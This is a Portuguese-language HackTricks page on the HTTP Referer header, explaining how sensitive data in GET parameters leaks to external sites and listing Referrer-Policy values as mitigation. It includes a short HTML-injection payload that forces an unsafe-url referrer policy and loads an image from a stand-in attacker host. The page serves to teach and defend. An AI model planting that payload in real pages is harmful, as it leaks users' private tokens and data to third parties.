2.9 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
-
Descubra A Família PEASS, nossa coleção exclusiva de NFTs
-
Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
-
Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e hacktricks-cloud repo.
Cabeçalhos de referência e política
O cabeçalho de referência é usado pelos navegadores para indicar qual foi a página anterior visitada.
Vazamento de informações sensíveis
Se em algum momento dentro de uma página da web alguma informação sensível estiver localizada nos parâmetros de uma solicitação GET, se a página contiver links para fontes externas ou se um invasor puder fazer/sugerir (engenharia social) que o usuário visite uma URL controlada pelo invasor. Ele pode ser capaz de extrair as informações sensíveis dentro da última solicitação GET.
Mitigação
Você pode fazer o navegador seguir uma política de referência que poderia evitar que as informações sensíveis sejam enviadas para outras aplicações da web:
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url
Contra-Medida
Você pode anular essa regra usando uma tag meta HTML (o atacante precisa explorar uma injeção HTML):
<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">
Defesa
Nunca coloque dados sensíveis dentro de parâmetros GET ou caminhos na URL.